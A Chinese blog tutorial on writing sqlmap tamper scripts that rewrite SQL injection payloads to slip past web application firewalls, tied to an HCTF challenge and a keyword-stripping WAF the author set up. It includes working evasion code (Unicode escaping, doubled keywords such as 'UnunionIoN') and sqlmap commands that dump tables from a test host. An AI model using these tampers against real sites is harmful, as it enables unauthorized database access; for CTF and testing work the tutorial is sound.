sqlmap tamper编写

上次HCTF中Li4n0师傅出了一道Kzone,非预期解可以利用Unicode编码关键字bypass掉WAF,发现如果手动编写sqlmap中的tamper脚本能够省事很多,于是就有了此文。

sqlmap tamper简介

sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。

使用方法

sqlmap.py XXXXX -tamper "模块名"

sqlmap脚本的tamper目录下有很多自带的tamper脚本,可以用来绕过特定的waf。
这篇文章讲的很详细:sqlmap的tamper详解

lowercase.py

我们从sqlmap自带的escapequotes.py了解tamper的结构。
这个脚本的作用是将单引号转换成\\',双引号转换成 \\",用于过滤了单引号或双引号的情况

#!/usr/bin/env python

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
pass

def tamper(payload, **kwargs):
"""
Slash escape single and double quotes (e.g. ' -> \')

>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'
"""

return payload.replace("'", "\\'").replace('"', '\\"')

可以看到tamper脚本的基本结构为priority变量定义和dependenciestamper函数定义。
* priority定义脚本的优先级,用于有多个tamper脚本的情况。
* dependencies函数声明该脚本适用或不适用的范围,可以为空。
* tamper是主要的函数,接受的参数为payload**kwargs,返回值为替换后的payload。

priority

在自带的tamper脚本中一共有以下几种优先级
还可以自定义-100~100

__priority__ = PRIORITY.LOWEST
__priority__ = PRIORITY.LOWER
__priority__ = PRIORITY.LOW
__priority__ = PRIORITY.NORMAL
__priority__ = PRIORITY.HIGH
__priority__ = PRIORITY.HIGHER
__priority__ = PRIORITY.HIGHEST

dependencies函数

dependencies函数,对tamper脚本支持/不支持使用的环境进行声明,可以为空

import os
from lib.core.common import singleTimeWarnMessage

def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS))
# singleTimeWarnMessage() 用于在控制台中打印出警告信息

tamper函数

tamper是整个脚本的主体。主要用于修改原本的payload,返回值为替换后的payload。
比如Kzone中通过Unicode编码关键字中的字符来绕过waf。

def tamper(payload, **kwargs):
payload = payload.lower()
payload = payload.replace('u', 'u0075')
payload = payload.replace('o', 'u006f')
payload = payload.replace('i', 'u0069')
payload = payload.replace(''', 'u0027')
payload = payload.replace('"', 'u0022')
payload = payload.replace(' ', 'u0020')
payload = payload.replace('s', 'u0073')
payload = payload.replace('#', 'u0023')
payload = payload.replace('>', 'u003e')
payload = payload.replace('<', 'u003c')
payload = payload.replace('-', 'u002d')
payload = payload.replace('=', 'u003d')
return payload

kwargs

在官方提供的47个tamper脚本中,kwargs参数只被使用了两次,两次都只是更改了http-header

# sqlmap/tamper/vanrish.py

def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
headers["X-originating-IP"] = "127.0.0.1"
return payload

结语

恰当的使用或者编写特定的tamper脚本能够省去很多不必要的麻烦。
且编写tamper时几乎所有的sqlmap内置的函数、变量都可以使用
__priority__ = PRIORITY.LOWER来源于sqlmap/lib/core/enums.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

class PRIORITY:
LOWEST = -100
LOWER = -50
LOW = -10
NORMAL = 0
HIGH = 10
HIGHER = 50
HIGHEST = 100

....
class DBMS:
ACCESS = "Microsoft Access"
DB2 = "IBM DB2"
FIREBIRD = "Firebird"
MAXDB = "SAP MaxDB"
MSSQL = "Microsoft SQL Server"
MYSQL = "MySQL"
ORACLE = "Oracle"
PGSQL = "PostgreSQL"
SQLITE = "SQLite"
SYBASE = "Sybase"
HSQLDB = "HSQLDB"
INFORMIX = "Informix"

class DBMS_DIRECTORY_NAME:
ACCESS = "access"
DB2 = "db2"
FIREBIRD = "firebird"
MAXDB = "maxdb"
MSSQL = "mssqlserver"
MYSQL = "mysql"
ORACLE = "oracle"
PGSQL = "postgresql"
SQLITE = "sqlite"
SYBASE = "sybase"
HSQLDB = "hsqldb"
INFORMIX = "informix"

实例

自己写了一个替换关键字为空的waf
图片.png
不使用脚本

python27 sqlmap.py -u "http://47.106.142.99:8008/list.php?id=1" -D ctf --tables

图片.png

编写脚本
test.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
pass

def tamper(payload, **kwargs):

payload=payload.lower()

payload=payload.replace('/*','//**')
payload=payload.replace('select','SeLselecteCt')
payload=payload.replace('union','UnunionIoN')
payload=payload.replace('and','Anandd')
payload=payload.replace('sleep','SlesleepEp')
payload=payload.replace('or','oorr')

return payload
python27 sqlmap.py -u "http://47.106.142.99:8008/list.php?id=1" --tamper=test -D ctf --tables

图片.png

Referer

sqlmap-tamper编写指南